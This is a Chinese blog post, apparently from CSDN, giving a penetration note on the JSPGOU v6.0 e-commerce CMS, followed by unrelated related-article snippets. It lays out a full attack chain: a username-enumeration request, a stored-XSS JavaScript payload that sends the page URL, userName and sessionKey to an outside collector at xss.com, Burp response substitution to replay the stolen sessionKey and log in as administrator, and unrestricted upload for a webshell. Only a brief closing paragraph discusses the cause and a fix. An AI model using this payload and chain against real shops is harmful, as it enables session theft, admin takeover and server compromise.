jspgou显示服务器异常,jspGOU单店版 v6.0 渗透笔记(组合GetShell)

最新推荐文章于 2021-08-06 11:46:40 发布
最新推荐文章于 2021-08-06 11:46:40 发布
阅读量417 收藏
点赞数
文章标签: jspgou显示服务器异常

JSPGOU单店版 v6.0 渗透笔记(组合GetShell)

jspgou是基于 java 技术研发的电子商务管理软件,以其强大、稳定、安全、高效、跨平台等多方面的优点,网站 模板统一在后台管理,系统拥有强大、灵活的标签,用户自定义显示内容和显示方式。jspgou为大、中、小企业 提供一个安全、高效、强大的电子商务解决方案,协助企业快速构建电子商务平台,拓展企业销售渠道。

以下漏洞理论通杀该CMS所有版本

0x01 用户遍历

GET /username_unique.jspx?username=admin HTTP/1.1

Host: demo3.jeecms.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0

Accept: application/json, text/javascript, */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Referer: http://demo3.jeecms.com/register.jspx

X-Requested-With: XMLHttpRequest

Connection: keep-alive

Cookie: JSESSIONID=A5EADADBD9C57169205A2E89B2CF98CA; clientlanguage=zh_CN; __qc_wId=66; pgv_pvid=9910498378

修改username参数后发包 返回false为存在 true为不存在。

0x02 前台储存型XSS(管理和用户均可打):

ca99d9be17633b9a46211ecbcf8166e3.png

jsExp:

var website = "http://xss.com/XSS/";

(function() {

(new Image()).src = website + '/?keepsession=1&location=' + escape((function() {

try {

return document.location.href

} catch (e) {

return ''

}

})()) + '&User=' + escape((function() {

try {

return localStorage.getItem("userName")

} catch (e) {

return ''

}

})()) + '&sessionKey=' + escape((function() {

try {

return localStorage.getItem("sessionKey")

} catch (e) {

return ''

}

})());

})();

注意看会发现写的exp里面连Cookie都没要 没错 这套系统的Cookie就是个摆设 sessionKey在整个运行过程起到了至关重要的地位 所以打Cookie时只取sessionKey就行

利用:

密码正确时的返回包

69cdbcd0fe7bbd1fc4c0f163adca104b.png

密码错误时的返回包

489dd274c22c7457917905dc3cea2987.png

密码正确后请求的第一个包:

c2a85ce8bb91b3d975313461443f10f7.png

xss打到的sessionKey正是这里所用到的 但是程序对数据包进行了校验 无法直接修改 利用burpsuite的响应包替换功能

91af3ae87cf8e7b847d94e9316fecf5b.png

将打到的sessionKey替换到

{"body":{"sessionKey":"c9a23148eb0ef01d540d8e27d39bd07f695b51f0c6c0f00dba017fc2c6eeacd39e19033297f0a6702a49edd3d919d32f","permission":"*"}, "message":"success", "code":200}

中来 然后替换掉 下面的数据包

{"body":"", "message":"username or password error", "code":306}

再然后 放开bp 账号密码随便输入 登录即为管理员:

c05d89229e9daef3fdf018d404ea02f1.png

0x03 GetShell:

通过后台=>界面=>资源管理=>上传文件可轻松Getshell 无限制

8f7c0a5dbe99df2fbbd000c85463ec7c.png

0x04 总结:

出现该问题应该是作者笃定了xss打不到后台去 事实也的确如此 代码在后台被过滤了 无法运行的 但是作者忘记了自己本身的机制就是依赖于sessionKey 每个用户登录后都会生成 并且存在用户端PC Admin账号也是如此 不管是admin先登录前台还是先登录后台 只要访问到了目标页面就一定中招。修复的话可以把Cookie真正校验起来 不要过度依赖sessionKey以及加密算法校验算法 (算法不可逆 但是hk可以拿你的加密结果去和 数据库 中加密值对比啊)

weixin_39707693
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JSP 及其他漏洞 -------学习笔记
tell_me_404的博客
03-09 834
一、JSP相关漏洞 1、struts2漏洞 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与...
jspgouV6-ROOT.zip
04-24
服务器搭建网站。
jspgou显示服务器异常,用tomcat部署jspgou
weixin_42370345的博客
08-06 416
Tomcat简介它是一套用来运行java web应用程序的服务环境 , java web应用程序的源码文件通常是*.jsp , jsp的服务环境由jdk和tomcat两个软件组成它被称作JAVA容器 , web容器 , web中间件 ; Tomcat发布jsp网站应用程序的方法和apache , nginx优点相似使用Tomcat部署jspgou实验准备:一台主机: IP地址为192.168.11...
记一次渗透测试自己的jsp项目
mathor的博客
10-31 1514
前两天写了个比较简单的login登陆页面,输入username和password,通过输入的username查询数据库中的password和框中的值进行对比验证 测试 先输入一对值,admin,123456,弹出信息 果然,意料之内用户名或密码错误,但是我们从这次测试能看出一点,这个数据传输的方式是post, 注入测试 先试一下SQL注入 还是没用,而且什么信息都没给,估计它本身并不返回任何...
服务器部署jspgou商城
lz你ps的博客
04-08 430
目录1. 前期准备2. 实际操作2.1 部署tomcat2.2 部署java开发环境2.3 修改环境变量2.4 检测java是否安装成功2.5 检测tomcat是否安装成功2.6 浏览器检测运行2.7 安装数据库2.8 启动服务并设置为开机启动2.9 部署数据库2.10 上传项目并解压2.11 删除测试页面,拷贝项目至网站发布目录2.12 数据库配置2.13 启动tomcat2.14 浏览器访问服...
jspgou网店系统 v6.0 单店
12-16
【标题】"jspgou网店系统 v6.0 单店"是一个专门为电商运营设计的开源软件,它标志着金磊科技对用户的一种承诺,即从2014年7月12日起,该系统将永久免费提供给使用者,不再收取任何费用。这一决定使得更多企业和...
jspgou单店 jspgou6.0-ROOT
09-16
jspgou单店 jspgou6.0-ROOT】是一款专为单店运营设计的网站程序,它基于Linux操作系统,利用Tomcat作为应用服务器,采用Java语言开发,并依赖于MySQL数据库来存储和管理数据。这个程序是经典服务器环境测试的一...
jspgou网店系统源码v6.0单店
07-24
JSPGOU一直以来都和jeecms、jeebbs一样,是收费软件,但是从2014年7月12日开始,开始jspgou发布第一个免费,金磊科技承诺:永远不向使用jspgou免费用户索取任何费用,为免费用户提供更好的技术支持服务,根据...
虚拟股市完美 v6.0.zip
06-19
虚拟股市完美 v6.0.zip
TekRadius 服务器管理软件 v5.5.6.0官方
12-23
TekRADIUS是一款Windows的RADIUS服务器,内置DHCP服务器,TekRADIUS符合RFC 2865和RFC 2866标准,TekRADIUS还支持TCP(RFC 6613)和TLS(RFC 6614-RadSec)传输,TekRADIUS有两个本:TekRADIUS(第一;...
jspgou完整网站
10-31
jspgou完整网站免费,很好的一个学习资料,欢迎大家下载学习
Tomcat构建企业级高负载WEB服务器-软件包.zip
04-20
jdk-8u151-linux-x64.tar.gz apache-tomcat-7.0.42.tar.gz apache-tomcat-9.0.1.tar.gz jspgouV6-ROOT.zip
三套JSP源代码的安装部署过程和遇到的问题图解
bcbobo21cn的专栏
09-09 3221
三个源码下载自源码之家; Maven和3个源码也可在此下载; http://pan.baidu.com/s/1qYnK784 一 jspxcms 其源码说明如下; # Jspxcms源码搭建说明_maven 本源码包采用maven结构,和普通eclipse的web项目结构不一样,且不包含lib目录下的第三方jar包。 ## 环境要求 - JDK1.6或
Tomcat web 站点部署 (jspgou
ordinary___的博客
05-24 176
Tomcat 部署web站点(jspgou) 部署前需要配置tomcat以及jdk环境 首先部署mysql数据库 [root@localhost ~]# wget https://dev.mysql.com/get/mysql80-community-release-el7-3.noarch.rpm [root@localhost ~]# rpm -ivh mysql80-community-release-el7-3.noarch.rpm # 选择mysql本 [root@localhost ~]#
Jenkins入门
weixin_34174422的博客
05-20 64
一、Jenkins概述 二、安装Jenkins https://pkg.jenkins.io/redhat-stable/ sudo wget -O /etc/yum.repos.d/jenkins.repo https://pkg.jenkins.io/redhat-stable/jenkins.repo sudo rpm --import https://pkg.jenkins.io/red...
java网店系统_java网店系统JSPGOU
weixin_39541869的博客
02-22 209
jspgou是基于java技术研发的电子商务管理软件,以其强大、稳定、安全、高效、跨平台等多方面的优点,网站模板统一在后台管理。jspgou系统升级jspgou系统内置在线自动扫描升级功能模块,在线自动升级只升级后台功能操作模块,不会升级前台,也就是说,如果有前后台功能的模块,在升级完成后,后台可以看到和使用,但是前台不会有变化,前台如果需要启用新功能,需要站长进行改动后才能正式启用。该模块会在1...
tomcat部署jspgou
blackcloud
10-14 1525
部署tomcat http server   环境6-8G内存 [root@dell710 ~]# systemctl stop firewalld [root@dell710 ~]# systemctl disable firewalld Removed symlink /etc/systemd/system/dbus-org.fedoraproject.FirewallD1.servi...
iwms 6.0getshell
最新发布
02-03
IWMS 6.0getshell是指在IWMS 6.0系统中成功获取了特权命令行的操作。通常情况下,通过利用系统中的漏洞或者使用特定的技术手段,黑客可以成功获取系统的特权命令行,从而可以执行一些比较高级的操作。这可能会对系统的安全性造成很大的威胁,因为黑客可以利用这个特权命令行来修改系统设置、窃取敏感信息或者进行其他恶意操作。 对于IWMS 6.0getshell的情况,系统管理员需要及时采取措施来修复系统漏洞,加强系统的安全设置,并对可能被黑客利用的漏洞进行深入的安全检测。除此之外,还需要及时更新系统的补丁,加强系统的监控和日志记录,以便发现并排除潜在的安全威胁。 另外,对于IWMS 6.0getshell的情况,用户也需要加强自身的安全意识,采取合适的密码设置、及时更新系统和应用程序,不随意点击可疑链接或下载未知来源的程序,以降低被黑客攻击的风险。 总之,对于IWMS 6.0getshell这种情况,需要系统管理员和用户共同合作,采取一系列的安全措施来保护系统的安全,防止黑客的攻击行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值